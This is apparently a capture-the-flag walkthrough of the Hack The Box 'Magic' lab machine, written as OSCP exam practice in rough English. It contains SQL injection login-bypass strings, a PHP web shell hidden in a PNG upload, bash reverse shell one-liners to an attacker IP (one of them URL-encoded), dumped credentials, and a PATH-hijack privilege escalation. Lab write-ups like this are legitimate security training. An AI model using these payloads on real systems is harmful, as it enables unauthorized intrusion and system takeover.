OSCP PREPROTİONS – HTB Magic

Magic machine is a vulnerable machine with Linux operating system among retired machines. We are expected to obtain user and root flags by using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic scan

Ful port scan

As a result of port scanning, 22/tcp ssh OpenSSH 7.6p1 and 80/tcp http Apache ports are open.
Let’s provide enumeration over port 80

Here we provided enumueraion on the web, we looked at the wpanalayzer and examined the source codes, but the only notable thing here was that there was a login page
We started a gobuster scan to detect hidden files and directories to see what might be lurking.
Gobuster scan

We did not get any results in the Gobuster scan.
Let’s go to login.php page here

Here comes the login screen, we looked at the source code etc. We did not see any interesting information. This is the input field where we enter the default credential information. We have not logged in, we first try sql injection attack to break this place
admin’or 1=1;– – –

admin’or’1=1;#
1’or’1’=1′))
admin’#
admin’– – –

We were able to make a successful entry here.

We encountered the upload page
Let’s test the file upload area here, a place that works in php code
We tried to create and upload any file with Touch

As far as we understand here file accepts jpg, jpeg png file lengths, let’s see how to bypass it
First, let’s add an additional esxtension to the file
I agreed to add png at the end

Let’s try here by adding the png at the end
filetest.php.png accepted when I uploaded the soy as filetest.php.png Let’s add a php shell screen by adding a comment to a png file here.

Then we wrote oho in front of the png extension to read this png file as php and uploaded it

Let’s go to the area where we uploaded the file

Here we added ? cmd=id to the url part and it gave us the id value

I’m trying to get him to give us a revershell
/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.19/4747 0>&1’
We use the command but it didn’t work because it was empty etc. so we encoded the url
http://10.10.10.185/images/uploads/shell.php.png?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.19%2F4747%200%3E%261%27
and we got it and we made a request
this is how we got Shell

In this shell we see that our authorization is limited, we provide local enumueration

We did not find any interesting information on Linpeas.sh. Here we continue with manual local emueration.

Here we have obtained the credetial information from the db.php5 file.
theseus:iamkingtheseus
We tried to change the user using this credental information and could not log in because it was incorrect.

Here we understand that mysql is running inside, let’s look at the network connections running inside to make sure of this

We made sure we saw port 3306
Here when trying to connect to myqsl it was saying that there was no mysql

Here we typed mysql and pressed tab twice to see the installed mysql

Here we were able to get the dubp of the db after a little work with the show and dump options.

Here we have obtained credential information
theseus:Th3s3usW4sK1ng
Let’s change authorization using the password

We have successfully obtained the user flag, but we still do not have root privileges.
So let’s continue with local enumeration

The /bin/sysinfo file gives information about the system
Here in the MEM Usage section, the free command is running, we will manipulate this free command to run bash, let’s try to get root authorization in this way

We couldn’t get the printout here

I think the commands are getting confused so I’ll ask him to give me a revershell here
bash -i >& /dev/tcp/10.10.14.19/1234 0>&1
I type the command

This is how we got root privileges